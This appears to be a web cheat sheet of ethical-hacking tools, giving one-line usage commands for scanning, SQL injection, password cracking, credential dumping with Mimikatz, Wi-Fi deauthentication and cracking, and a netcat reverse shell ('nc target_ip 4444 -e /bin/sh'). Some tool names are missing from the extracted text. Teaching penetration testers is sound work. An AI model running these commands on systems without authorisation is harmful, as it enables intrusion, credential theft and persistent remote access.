Catalog / Ethical Hacking Tools Cheatsheet

Ethical Hacking Tools Cheatsheet

A comprehensive cheat sheet covering essential tools used in ethical hacking, their functionalities, and common use cases. This serves as a quick reference for penetration testers and security professionals.

Reconnaissance Tools

Network Scanning

Nmap (Network Mapper)

A versatile tool for network discovery and security auditing. It can identify hosts, services, operating systems, and firewall rules.

Usage: nmap -sV -A target_ip


The GUI version of Nmap, providing a user-friendly interface for complex scans and visualizing network topologies.

Usage: Launch Zenmap and configure scan profiles.


A high-speed port scanner designed for scanning large networks quickly.

Usage: masscan -p1-65535 target_ip/24


An active/passive ARP reconnaissance tool.

Usage: netdiscover -i eth0 -r


A command-line packet analyzer/assembler.

Usage: hping3 -S target_ip -p 80

Vulnerability Scanning


A comprehensive vulnerability scanner that identifies security flaws, missing patches, and malware.

Usage: Configure scan policies and target IPs via the Nessus web interface.


An open-source vulnerability scanner that performs comprehensive security assessments.

Usage: Set up scan targets and schedules via the OpenVAS web interface.


A web server scanner which performs comprehensive tests against web servers for multiple items, including dangerous files/CGIs, outdated server software and other problems.

Usage: nikto -h target_url

Web Reconnaissance


A Java application used to brute-force directories and files on web servers.

Usage: Configure the target URL and wordlist in Dirbuster’s GUI.


A browser extension that identifies technologies used on a website.

Usage: Install the Wappalyzer extension and visit the target website.


A website fingerprinting tool that identifies technologies and CMS versions.

Usage: whatweb target_url

Exploitation Tools

Exploitation Frameworks


A powerful framework for developing and executing exploit code against a remote target.

Usage: msfconsole to launch, then use search, use, set, and exploit commands.


A GUI front-end for Metasploit, simplifying exploit selection and management.

Usage: Launch Armitage and connect to a Metasploit instance.

Core Impact

A commercial penetration testing tool that automates vulnerability assessment and exploitation.

Usage: Configure targets and run automated assessments via the Core Impact GUI.

Web Application Exploitation

Burp Suite

An integrated platform for performing security testing of web applications.

Usage: Configure Burp Suite as a proxy and intercept web traffic to analyze and modify requests.


A free, open-source web application security scanner.

Usage: Configure ZAP as a proxy and use automated or manual testing features.


An automated SQL injection tool that detects and exploits SQL injection vulnerabilities.

Usage: sqlmap -u target_url --dbs

Password Cracking

John the Ripper

A fast password cracker that supports multiple hash types.

Usage: john --wordlist=wordlist.txt hash_file


An advanced password recovery tool with GPU acceleration.

Usage: hashcat -m hash_type hash_file wordlist.txt

Post-Exploitation Tools

Privilege Escalation

A script to enumerate information from Linux systems for privilege escalation.

Usage: Transfer the script to the target, make it executable, and run it.

Windows Exploit Suggester (

A Python script to suggest potential exploits for Windows systems based on patch levels.

Usage: Run the script against systeminfo output.

Data Extraction


A tool to extract plaintext passwords, hash, PIN codes and kerberos tickets from memory.

Usage: Load Mimikatz module in Metasploit or run directly on the target.

PowerShell Empire

A post-exploitation framework for PowerShell, enabling data exfiltration and persistence.

Usage: Set up Empire server and agents on the target.

Maintaining Access

Reverse Shells

Establish a reverse shell for persistent access.

Example: nc -lvp 4444 (listener) and nc target_ip 4444 -e /bin/sh (target)

Cron Jobs

Schedule tasks for persistent access.

Usage: crontab -e to edit cron jobs.

Wireless Hacking Tools

Wireless Reconnaissance

Aircrack-ng Suite

A complete suite of tools for wireless network assessment.

Tools: airodump-ng, aireplay-ng, aircrack-ng.


A wireless network detector, sniffer, and intrusion detection system.

Usage: Run Kismet to passively collect wireless network data.

Wireless Exploitation


Used to inject packets, useful for deauthenticating clients or generating traffic.

Usage: aireplay-ng -0 1 -a AP_MAC -c CLIENT_MAC wlan0


Used to crack WEP and WPA/WPA2-PSK keys.

Usage: aircrack-ng -w wordlist.txt capture.cap

Bluetooth Hacking


Discovers Bluetooth devices.

Usage: Run Bluelog to scan for nearby Bluetooth devices.


Exploits Bluetooth vulnerabilities to access data.

Usage: Bluesnarfer target_MAC